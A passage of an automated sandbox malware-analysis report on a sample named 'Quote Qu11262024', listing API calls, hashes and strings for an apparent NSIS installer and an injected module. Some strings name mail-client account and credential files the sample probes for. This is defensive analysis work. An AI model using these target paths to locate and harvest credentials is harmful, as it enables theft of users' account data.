                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402DAA
                                                                                                      • Part of subcall function 00402CF8: MulDiv.KERNEL32(?,00000064,?), ref: 00402D0D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                    • String ID: ... %d%%
                                                                                                    • API String ID: 722711167-2449383134
                                                                                                    • Opcode ID: 14fa708bd0873e7b96fead96f83c9e10ab3d3aa7fdc5ce6b42caac6e583b94fc
                                                                                                    • Instruction ID: ef8eed0ec1e1a84a002a1e67416108222ae87c27a2fbfe946e473021573d6626
                                                                                                    • Opcode Fuzzy Hash: 14fa708bd0873e7b96fead96f83c9e10ab3d3aa7fdc5ce6b42caac6e583b94fc
                                                                                                    • Instruction Fuzzy Hash: FC018430505610EBCB22AB65EF0DADF7A68FF05706B04403BF945B11E0CBB84C41DAAD
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE1
                                                                                                    • GetMessagePos.USER32 ref: 00404AE9
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404B03
                                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B15
                                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                    • String ID: f
                                                                                                    • API String ID: 41195575-1993550816
                                                                                                    • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                    • Instruction ID: 9ec2eb1330efd27cea2dc672471069c57dcd17466ea5ac0e7eb7993aba0fe251
                                                                                                    • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                    • Instruction Fuzzy Hash: 4E014C71900219BAEB00DBA4DD85BFEBBBCAF55711F10412BBB50B61D0C7B4A9018BA4
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                                                                                                    • wsprintfA.USER32 ref: 00402CCB
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402CDB
                                                                                                    • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                    • API String ID: 1451636040-1158693248
                                                                                                    • Opcode ID: 77b2be4c33972075b46706dcadaaaf4812fd02cffaa33e9a7d579d75a3179346
                                                                                                    • Instruction ID: 00f793533a20a7d44d75197907a1701575304e439739864cb4e0d2fe2ab89f6b
                                                                                                    • Opcode Fuzzy Hash: 77b2be4c33972075b46706dcadaaaf4812fd02cffaa33e9a7d579d75a3179346
                                                                                                    • Instruction Fuzzy Hash: 1DF0317050020CFBEF245F61CE0ABAE3769EB04344F00803EFA16B51D0DBB899559F59
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406415
                                                                                                    • wsprintfA.USER32 ref: 0040644E
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00406462
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                                    • API String ID: 2200240437-4240819195
                                                                                                    • Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                                                                    • Instruction ID: 2838f6cf9fc6cc64fdd2d144a05328c337edde397d0505f880392109b3eca7ab
                                                                                                    • Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                                                                    • Instruction Fuzzy Hash: B5F0F67050061A6BDB149BA8DD0DFFB369CBB08304F54047AA686E10C1EA78D9258B5C
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,37146FFD,00000000,?,?,?,37148A72,?,?,00000100), ref: 3714887B
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,37148A72,?,?,00000100,5EFC4D8B,?,?), ref: 37148901
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 371489FB
                                                                                                    • __freea.LIBCMT ref: 37148A08
                                                                                                      • Part of subcall function 371456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37145702
                                                                                                    • __freea.LIBCMT ref: 37148A11
                                                                                                    • __freea.LIBCMT ref: 37148A36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: a24503d00790c8e3f053cc8cb7a26d5618fff5294086f0d7b4056b4dc1eaf138
                                                                                                    • Instruction ID: e53728490770cf465a3f96ad341106131b8a9bcaf1b41500a761fbe8cf1a666a
                                                                                                    • Opcode Fuzzy Hash: a24503d00790c8e3f053cc8cb7a26d5618fff5294086f0d7b4056b4dc1eaf138
                                                                                                    • Instruction Fuzzy Hash: D751E7B3610216ABEB168F60CC41FBB77BAEB45BA4F614628FC04D7140EBB4EC51E651
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                                                                                                    • GlobalFree.KERNEL32(?), ref: 004027EB
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004027FE
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2667972263-0
                                                                                                    • Opcode ID: 2f86501c5adec20ec0de79fdd2c9121cd3fc0b1b33a14785e0204e614e850fb7
                                                                                                    • Instruction ID: 251c30b32f8bc52cb02f612f53af1c06d39ab9b455335e0d0e57135b7b4c512f
                                                                                                    • Opcode Fuzzy Hash: 2f86501c5adec20ec0de79fdd2c9121cd3fc0b1b33a14785e0204e614e850fb7
                                                                                                    • Instruction Fuzzy Hash: F4219F71800124BBDF207FA5DE49EAE7A79EF45364F14823EF520762E0CB7949018FA8
                                                                                                    APIs
                                                                                                    • _strlen.LIBCMT ref: 37141607
                                                                                                    • _strcat.LIBCMT ref: 3714161D
                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,3714190E,?,?,00000000,?,00000000), ref: 37141643
                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,3714190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 3714165A
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,3714190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 37141661
                                                                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,3714190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 37141686
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1922816806-0
                                                                                                    • Opcode ID: a4cdacdab83b3c19546b1ea648aac5f43b2d71184ec2919a5d32305fa677571d
                                                                                                    • Instruction ID: 745320b3e6707f98cc2b55fb6595e8dd9ce6d44b890ef58151c37fb011033faf
                                                                                                    • Opcode Fuzzy Hash: a4cdacdab83b3c19546b1ea648aac5f43b2d71184ec2919a5d32305fa677571d
                                                                                                    • Instruction Fuzzy Hash: 9721DA37A00204BBDB05DB55DC85EEE77BAEF88720F14402AEA04BB141DB78A542D7A6
                                                                                                    APIs
                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 37141038
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 3714104B
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 37141061
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 37141075
                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 37141090
                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 371410B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 3594823470-0
                                                                                                    • Opcode ID: d4a36fa39e8e7854362a638f59821a1a179f67ded0a804d1ee9a2f600377df37
                                                                                                    • Instruction ID: 7c2d6f2c9dc277fad0e4c05329386a79c1326f62c3c65497ed6fb860b592d196
                                                                                                    • Opcode Fuzzy Hash: d4a36fa39e8e7854362a638f59821a1a179f67ded0a804d1ee9a2f600377df37
                                                                                                    • Instruction Fuzzy Hash: 1321A17B9003189BCFA1DB61DC4CEDB3739EF44324F104296E959A31A1DF349A86DB41
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,37143518,371423F1,37141F17), ref: 37143864
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 37143872
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 3714388B
                                                                                                    • SetLastError.KERNEL32(00000000,?,37143518,371423F1,37141F17), ref: 371438DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: 54e07accc32a6b11ea3dba55c9d42f137bbdfbebf28c55a1732244df8d04d64e
                                                                                                    • Instruction ID: 1a93e0b6f7d297c0e4159d0977e8f7840ce63caf10d1af69776da78ea19ed8c6
                                                                                                    • Opcode Fuzzy Hash: 54e07accc32a6b11ea3dba55c9d42f137bbdfbebf28c55a1732244df8d04d64e
                                                                                                    • Instruction Fuzzy Hash: 3701D4376487125EB70A1679EC8BA176B75DF4D679BA10329F510BA0D0EF1948139341
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,37146C6C), ref: 37145AFA
                                                                                                    • _free.LIBCMT ref: 37145B2D
                                                                                                    • _free.LIBCMT ref: 37145B55
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,37146C6C), ref: 37145B62
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,37146C6C), ref: 37145B6E
                                                                                                    • _abort.LIBCMT ref: 37145B74
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3160817290-0
                                                                                                    • Opcode ID: 45597ac12e3a07841b455d1814b03b004bbb7da5447cf3452d57b44f94db8729
                                                                                                    • Instruction ID: b3f5813f6f4a036d6ce362088391ff6a195498c93af47014dcf3a739b98239c2
                                                                                                    • Opcode Fuzzy Hash: 45597ac12e3a07841b455d1814b03b004bbb7da5447cf3452d57b44f94db8729
                                                                                                    • Instruction Fuzzy Hash: 63F06877544700BAD7471634EC49F1E2B7B9FC59B5B660124F918B7288FF2C8A134276
                                                                                                    APIs
                                                                                                      • Part of subcall function 37141E89: lstrlenW.KERNEL32(?,?,?,?,?,371410DF,?,?,?,00000000), ref: 37141E9A
                                                                                                      • Part of subcall function 37141E89: lstrcatW.KERNEL32(?,?,?,371410DF,?,?,?,00000000), ref: 37141EAC
                                                                                                      • Part of subcall function 37141E89: lstrlenW.KERNEL32(?,?,371410DF,?,?,?,00000000), ref: 37141EB3
                                                                                                      • Part of subcall function 37141E89: lstrlenW.KERNEL32(?,?,371410DF,?,?,?,00000000), ref: 37141EC8
                                                                                                      • Part of subcall function 37141E89: lstrcatW.KERNEL32(?,371410DF,?,371410DF,?,?,?,00000000), ref: 37141ED3
                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 3714122A
                                                                                                      • Part of subcall function 3714173A: _strlen.LIBCMT ref: 37141855
                                                                                                      • Part of subcall function 3714173A: _strlen.LIBCMT ref: 37141869
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                    • API String ID: 4036392271-1520055953
                                                                                                    • Opcode ID: e59dfe623f5d49309a5121dad2d4c67de6b1c9a03a77337c1814d85677aadc23
                                                                                                    • Instruction ID: 2ca69333ca22e8a77beb52ad7125ab6e416594a7c1d4dbef0d88c9b33f85dc8d
                                                                                                    • Opcode Fuzzy Hash: e59dfe623f5d49309a5121dad2d4c67de6b1c9a03a77337c1814d85677aadc23
                                                                                                    • Instruction Fuzzy Hash: 5421FB7AE502086BEB1497D0DC91FED733AEF40714F100556F605FB1D0E6B51E80875A
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(00420D30,00420D30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048D7,000000DF,00000000,00000400,?), ref: 00404A5A
                                                                                                    • wsprintfA.USER32 ref: 00404A62
                                                                                                    • SetDlgItemTextA.USER32(?,00420D30), ref: 00404A75
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                    • String ID: %u.%u%s%s$0B
                                                                                                    • API String ID: 3540041739-2032437577
                                                                                                    • Opcode ID: b2c3753761e65f6dc0c62e6c088a143485d20d832235edb04c9afbceaa63be5f
                                                                                                    • Instruction ID: ba59289b4e1d69b0e9226f0d24e2fd9302e291b2b78ff081cbe6c40e89f38270
                                                                                                    • Opcode Fuzzy Hash: b2c3753761e65f6dc0c62e6c088a143485d20d832235edb04c9afbceaa63be5f
                                                                                                    • Instruction Fuzzy Hash: 7611EB73A4412437DB10666D9D41EAF3298DB85378F25423BFA26F31D1ED79CC1291A8
                                                                                                    APIs
                                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,0042A000,76233410,0042B400,00000000,00403303,0042B400,0042B400,0040353A,?,00000006,00000008,0000000A), ref: 00406396
                                                                                                    • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004063A3
                                                                                                    • CharNextA.USER32(?,0042A000,76233410,0042B400,00000000,00403303,0042B400,0042B400,0040353A,?,00000006,00000008,0000000A), ref: 004063A8
                                                                                                    • CharPrevA.USER32(?,?,76233410,0042B400,00000000,00403303,0042B400,0042B400,0040353A,?,00000006,00000008,0000000A), ref: 004063B8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$Prev
                                                                                                    • String ID: *?|<>/":
                                                                                                    • API String ID: 589700163-165019052
                                                                                                    • Opcode ID: 096eed3e07655558447cba4fe868cf82c79cb4728298f77ddcd2d6580ccfabae
                                                                                                    • Instruction ID: e256bf53f2bf7f1db487ac9dc9c07131b2aa4a215ad0ab875251a79b4c50c1ef
                                                                                                    • Opcode Fuzzy Hash: 096eed3e07655558447cba4fe868cf82c79cb4728298f77ddcd2d6580ccfabae
                                                                                                    • Instruction Fuzzy Hash: 7111E2618047952DEB3216284D80B776F9D8B56760F1A047FECC2722C2CA7C5C6296AD
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,37144AEA,?,?,37144A8A,?,37152238,0000000C,37144BBD,00000000,00000000), ref: 37144B59
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 37144B6C
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,37144AEA,?,?,37144A8A,?,37152238,0000000C,37144BBD,00000000,00000000,00000001,37142082), ref: 37144B8F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 65ac39d3f7120c2d7986a74ec6f731b53bdd3a738843ae7d1d1c99006790e9ad
                                                                                                    • Instruction ID: 6aaab4150f94a5146aa0278dfabe84e0ba2090bf8bdae14b21cf84b9cf8a77cb
                                                                                                    • Opcode Fuzzy Hash: 65ac39d3f7120c2d7986a74ec6f731b53bdd3a738843ae7d1d1c99006790e9ad
                                                                                                    • Instruction Fuzzy Hash: A9F08177940108BFDF029F90C809B9DBFB9EF44661F814154E905B3140DB349A52DB51
                                                                                                    APIs
                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,0040A400,0042A800,00000000,00000000,00000031), ref: 00401798
                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,0040A400,0040A400,00000000,00000000,0040A400,0042A800,00000000,00000000,00000031), ref: 004017C2
                                                                                                      • Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033FA,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060E1
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000,?), ref: 00405234
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00402D8B,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000), ref: 00405244
                                                                                                      • Part of subcall function 004051FB: lstrcatA.KERNEL32(00420510,00402D8B,00402D8B,00420510,00000000,00000000,00000000), ref: 00405257
                                                                                                      • Part of subcall function 004051FB: SetWindowTextA.USER32(00420510,00420510), ref: 00405269
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                    • String ID:
                                                                                                    • API String ID: 1941528284-0
                                                                                                    • Opcode ID: f98ef7586a1488c2809fe37f48dc53ebec0b4f816754b1445cd5290023bc530e
                                                                                                    • Instruction ID: fd1e5837bc3e5b85a3a6a652d6a190d3276035103b1b7c060325475ee2933dee
                                                                                                    • Opcode Fuzzy Hash: f98ef7586a1488c2809fe37f48dc53ebec0b4f816754b1445cd5290023bc530e
                                                                                                    • Instruction Fuzzy Hash: 7C41C931900515BACB10BBB5CC45EAF36A8EF01369B61823BF522B11E1CB7C8A519B6D
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 3714715C
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 3714717F
                                                                                                      • Part of subcall function 371456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37145702
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 371471A5
                                                                                                    • _free.LIBCMT ref: 371471B8
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 371471C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
